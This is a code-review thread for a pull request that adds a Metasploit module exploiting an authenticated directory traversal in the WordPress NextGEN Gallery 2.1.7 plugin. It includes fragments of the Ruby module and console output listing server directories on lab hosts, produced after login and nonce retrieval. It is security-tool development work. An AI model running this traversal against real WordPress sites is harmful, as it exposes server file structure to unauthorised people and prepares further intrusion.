### PR TITLE
Add WP NextGEN Gallery Directory Traversal Vuln

### PR DESCRIPTION
**Pull request by espreto**
#### Add WordPress Plugin NextGEN Gallery Auth Directory Traversal Vulnerability.

  Application: WordPress Plugin 'NextGEN Galley' 2.1.7
  Homepage: https://wordpress.org/plugins/nextgen-gallery/
  Source Code: https://downloads.wordpress.org/plugin/nextgen-gallery.2.1.7.zip
  Active Installs (wordpress.org): 1 Million+
  References: https://wpvulndb.com/vulnerabilities/8165
#### Vulnerable packages*

  2.1.7
##### Linux (Ubuntu 12.04.5 LTS):

```
 msf> auxiliary(wp_nextgen_galley_dir_read)  run

[+] 192.168.1.63:80 - File saved in: /home/espreto/.msf4/loot/20150901032100_default_192.168.1.63_nextgen.traversa_756306.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
 msf> auxiliary(wp_nextgen_galley_dir_read)  head /home/espreto/.msf4/loot/20150901032100_default_192.168.1.63_nextgen.traversa_756306.txt
[*] exec: head /home/espreto/.msf4/loot/20150901032100_default_192.168.1.63_nextgen.traversa_756306.txt

/etc/.java/
/etc/acpi/
/etc/alternatives/
/etc/apache2/
/etc/apm/
/etc/apparmor/
/etc/apparmor.d/
/etc/apport/
/etc/apt/
 msf> auxiliary(wp_nextgen_galley_dir_read)  set DIRPATH /var/www/
DIRPATH => /var/www/
 msf> auxiliary(wp_nextgen_galley_dir_read)  run

[+] 192.168.1.63:80 - File saved in: /home/espreto/.msf4/loot/20150901032225_default_192.168.1.63_nextgen.traversa_376098.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
 msf> auxiliary(wp_nextgen_galley_dir_read)  head /home/espreto/.msf4/loot/20150901032225_default_192.168.1.63_nextgen.traversa_376098.txt
[*] exec: head /home/espreto/.msf4/loot/20150901032225_default_192.168.1.63_nextgen.traversa_376098.txt

/var/www/html/
/var/www/logs/
/var/www/simple-backup/
/var/www/wp-admin/
/
/var/www/wp-includes/
 msf> auxiliary(wp_nextgen_galley_dir_read)
```

A big thank you to the @wchen-r7 for help with the nonce. :+1:

### CODE REVIEW

File: modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb [hunk 1]
```diff
@@ -0,0 +1,141 @@
...
+
+    if res && res.code == 200 && res.body && res.body.to_s.length > 0
+      begin
+        results = JSON.parse(res.body)['html']
+      rescue JSON::ParserError
+        vprint_error("#{peer} - Unable to parse JSON")
+        return
+      end
+
+      res_new = results.gsub(/<u(.*)>/, '').gsub(/<\/ul>/, '').gsub(/<l(.*)"\/..\/..\/..\/../, '').gsub(/"(.*)i>/, '')
```
Comment (espreto) [inline modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb]: I don't feel comfortable with this regex. Could someone give a new idea? Tks guys! :)

Comment (wchen-r7) [inline modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb]: Ah this. I was actually thinking Nokogiri yesterday, but didn't get a chance to do it. Let me play with that today, and then if it's good, I'll give you the code here.

Comment (FireFart) [inline modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb]: @espreto can you provide the content of the `results` variable before applying the gsub?

Comment (wchen-r7) [inline modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb]: @espreto here you go:

1 - require these:

```
require 'json'
require 'nokogiri'
```

2 - Add this method:

```ruby
  def parse_paths(res)
    begin
      j = JSON.parse(res.body)
    rescue JSON::ParserError => e
      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
      return []
    end

    html = j['html']
    noko = Nokogiri::HTML(html)
    links = noko.search('a')
    links.collect { |e| normalize_uri("#{datastore['FILEPATH']}/#{e.text}") }
  end
```

3. And then make sure to update the store_loot call:

```ruby
      paths = parse_paths(res)
      path = store_loot(
        'nextgen.traversal',
        'text/plain',
        ip,
        paths,
        fname
      )
```

You can also see my version of the source here:
https://gist.github.com/wchen-r7/6beb62dcd727444026b9

Comment (espreto) [inline modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb]: Done @wchen-r7, thank you. :+1: 

Just changed the ```$stderr.puts paths * "\n" ``` to ``` vprint_line(paths * "\n") ```. msftidy accuses error.
```
modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb:136 - [ERROR] Writes to stdout
```

File: modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb [hunk 2]
```diff
@@ -0,0 +1,152 @@
...
+
+      paths = parse_paths(res)
+      vprint_line(paths * "\n")
+
+      fname = datastore['DIRPATH']
+      path = store_loot(
+        'nextgen.traversal',
+        'text/plain',
+        ip,
+        paths,
```
Comment (wchen-r7) [inline modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb]: Should this be ```paths * "\n"``` or ```paths``` is fine?

Comment (espreto) [inline modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb]: You're right. ```paths``` was not legal. :(
Changed to ```paths * "\ n"```.

**Comment by wchen-r7** [comment]
This works pretty good for me, I will merge it. Thanks.

```
msf auxiliary(wp_nextgen_galley_file_read) > set dirpath /var/www/html/
dirpath => /var/www/html/
msf auxiliary(wp_nextgen_galley_file_read) > run

[*] 192.168.1.191:80 - Trying to login as: admin
[*] 192.168.1.191:80 - Trying to get nonce...
[*] 192.168.1.191:80 - Got nonce: 4c15eb3bae
/var/www/html/config
/var/www/html/phpmyadmin
/var/www/html/wordpress
```

**Pull request merged**